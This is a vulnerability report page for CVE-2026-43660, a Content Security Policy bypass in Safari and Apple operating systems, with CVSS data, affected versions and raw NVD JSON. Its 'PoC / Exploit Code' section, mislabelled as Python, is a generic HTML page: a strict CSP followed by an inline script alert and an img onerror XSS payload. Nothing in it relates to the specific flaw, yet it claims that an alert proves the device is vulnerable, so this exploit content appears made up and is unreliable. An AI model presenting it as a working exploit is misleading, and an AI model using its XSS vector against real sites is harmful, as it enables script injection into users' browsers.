Security Vulnerability Report
中文
CVE-2026-43660 CVSS 7.5 HIGH

CVE-2026-43660

Published: 2026-05-11 21:19:02
Last Modified: 2026-05-13 21:16:48
Source: [email protected]

Description

A validation issue was addressed with improved logic. This issue is fixed in Safari 26.5, iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing maliciously crafted web content may prevent Content Security Policy from being enforced.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
Safari < 26.5
iOS < 18.7.9
iPadOS < 18.7.9
iOS < 26.5
iPadOS < 26.5
macOS Tahoe < 26.5
tvOS < 26.5
visionOS < 26.5
watchOS < 26.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for CVE-2026-43660: Content Security Policy Bypass Description: This HTML file demonstrates a scenario where CSP is not enforced. Target: Safari < 26.5, iOS < 26.5, etc. --> <!DOCTYPE html> <html> <head> <!-- Strict CSP policy that should block all inline scripts --> <meta http-equiv="Content-Security-Policy" content="default-src 'none'; script-src 'self'; object-src 'none';"> <title>CVE-2026-43660 PoC</title> </head> <body> <h1>CSP Bypass Verification</h1> <p>If an alert appears, the device is vulnerable to CVE-2026-43660.</p> <!-- In a vulnerable version, this script executes despite the CSP above --> <script> alert("[+] CVE-2026-43660 Exploited: CSP Bypass Successful!"); console.log("CSP validation logic failed to block execution."); </script> <!-- Alternative vector using image onerror --> <img src=x onerror="alert('[+] Alternative XSS Vector via CSP Bypass')"> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-43660", "sourceIdentifier": "[email protected]", "published": "2026-05-11T21:19:01.720", "lastModified": "2026-05-13T21:16:47.520", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A validation issue was addressed with improved logic. This issue is fixed in Safari 26.5, iOS 18.7.9 and iPadOS 18.7.9, iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, tvOS 26.5, visionOS 26.5, watchOS 26.5. Processing maliciously crafted web content may prevent Content Security Policy from being enforced."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.9", "matchCriteriaId": "F3968B76-E6DE-416D-A0FB-E4833FFAAE0F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.5", "matchCriteriaId": "20644D7E-2AB6-48CA-AED4-C474A9867986"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.7.9", "matchCriteriaId": "B6431EAF-B395-4C19-9AB6-A2F45991C897"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.5", "matchCriteriaId": "1BE54A3B-D667-43BA-AB71-BCF8438054E0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.5", "matchCriteriaId": "6CB91417-90A8-4A9B-A1D0-1D94B80EF837"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.5", "matchCriteriaId": "176C47FD-FA25-437B-9061-A81CAA367AEF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.5", "matchCriteriaId": "C8F45D80-0DF8-444E-9AF1-703A1075F046"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.5", "matchCriteriaId": "057B244F-5485-4108-8E23-FE15F5256EE7"}]}]}], "references": [{"url": "https://support.apple.com/en-us/127110", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127111", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127115", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127118", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127119", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127120", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127121", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.